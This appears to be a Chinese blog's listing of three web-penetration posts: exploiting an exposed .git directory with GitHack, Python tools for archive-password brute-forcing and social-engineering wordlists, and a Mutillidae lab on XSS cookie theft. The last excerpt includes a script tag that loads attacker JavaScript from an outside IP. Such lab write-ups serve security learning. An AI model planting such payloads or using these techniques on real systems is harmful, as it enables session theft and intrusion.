web渗透
关注
分享
扫一扫
文章平均质量分 60
whiteinblack
这个作者很懒,什么都没留下…
展开
-
利用.Git对服务器进行的一次渗透
此次渗透起源于我写了一个python的聊天脚本,tcp通信可以挂在外网上,但是udp通信接收不到消息,于是我想弄一台内网服务器运行我的服务端脚本转发消息。 使用AWVS对改服务器进行扫描:发现.git漏洞在GitHub上下载githack软件https://github.com/lijiejie/GitHack利用这个软件可以复原工程源码,再分析源码寻...原创 2018-09-18 22:03:53 · 1875 阅读 · 0 评论 -
python实现:压缩文件爆破,社工字典生成小工具
其实我学python的本心是用来开发工具的,有一个python实现的whois域名查询工具,过于简单就不写博客了,其实就是一个简单爬虫就能实现的功能。最近闲来无事发现工作室的招新试卷压缩包是经过加密的,以前爆破都是直接下载工具下载字典爆破的。终于可以自己写一个工具了哈哈。于是就开始写压缩文件爆破工具和社工字典生成工具。下面简单介绍下原理:压缩文件爆破工具:其实原理很简单,...原创 2018-09-24 21:06:43 · 2234 阅读 · 0 评论 -
mutillidae平台:XSS Payload 之cookie窃取练习
此次练习主要是用mutillidae靶场实现了《白帽子讲web安全》上的xss payload 窃取用户cookie实例。需要创建两个用户进行测试:墨中白,test用账号墨中白进入xss blog练习页面:在文本框中插入代码<script type="text/javascript" src="http://47.116.10.120/wxx.js"></s...原创 2018-09-26 01:01:58 · 2187 阅读 · 2 评论